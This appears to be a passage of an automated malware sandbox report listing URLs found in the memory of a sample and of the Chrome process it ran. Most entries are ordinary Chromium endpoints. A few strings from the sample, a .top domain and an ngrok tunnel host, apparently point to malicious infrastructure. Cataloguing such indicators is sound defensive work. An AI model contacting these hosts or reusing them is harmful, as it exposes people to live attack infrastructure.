Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063045895.000072B402684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/72794
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063045895.000072B402684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2059971722.000072B40221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/77616
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000004.00000002.2063816677.000072B402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/82807
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.2063733248.000072B40283C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.2061511879.000072B402334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 00000004.00000002.2060212008.000072B40225A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000003.1700231599.0000000007172000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.1700231599.0000000007172000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000003.2040863359.000072B403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040787421.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040589912.000072B40316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040698260.000072B40321C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000004.00000003.2042364517.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040863359.000072B403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042394781.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042314996.000072B402EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040739786.000072B40326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062265998.000072B4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042779100.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040787421.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2068289008.000072B40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040589912.000072B40316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040698260.000072B40321C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042550728.000072B403144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042898821.000072B4032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063045895.000072B4026A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000004.00000003.2042364517.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040863359.000072B403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042394781.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042314996.000072B402EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040739786.000072B40326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062265998.000072B4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042779100.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040787421.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2068289008.000072B40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040589912.000072B40316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040698260.000072B40321C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042550728.000072B403144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042898821.000072B4032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063045895.000072B4026A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000004.00000003.2042364517.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040863359.000072B403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042394781.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042314996.000072B402EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040739786.000072B40326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062265998.000072B4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042779100.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040787421.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2068289008.000072B40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040589912.000072B40316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040698260.000072B40321C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042550728.000072B403144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042898821.000072B4032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063045895.000072B4026A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000004.00000003.2042364517.000072B402C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040863359.000072B403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042394781.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042314996.000072B402EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040739786.000072B40326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062265998.000072B4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042779100.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040787421.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2068289008.000072B40340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040589912.000072B40316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2040698260.000072B40321C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042550728.000072B403144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2042898821.000072B4032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063045895.000072B4026A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000004.00000002.2065161054.000072B402B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000004.00000002.2065221354.000072B402BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000004.00000002.2065221354.000072B402BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000004.00000002.2065445240.000072B402C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000004.00000002.2061094058.000072B40228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000004.00000002.2062914144.000072B40261C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000004.00000002.2059971722.000072B40221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000004.00000002.2062999108.000072B402644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2060212008.000072B402244000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2063703306.000072B40281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000004.00000002.2063194312.000072B4026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.2065445240.000072B402C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.2061272111.000072B4022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.2061272111.000072B4022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.2061272111.000072B4022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.2061094058.000072B40228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066247525.000072B402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.2061884855.000072B40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.2061821161.000072B4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.1700231599.0000000007172000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.1700231599.0000000007172000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000003.2034840135.000072B402590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2066080118.000072B402DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035384037.000072B402BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2035352170.000072B402590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
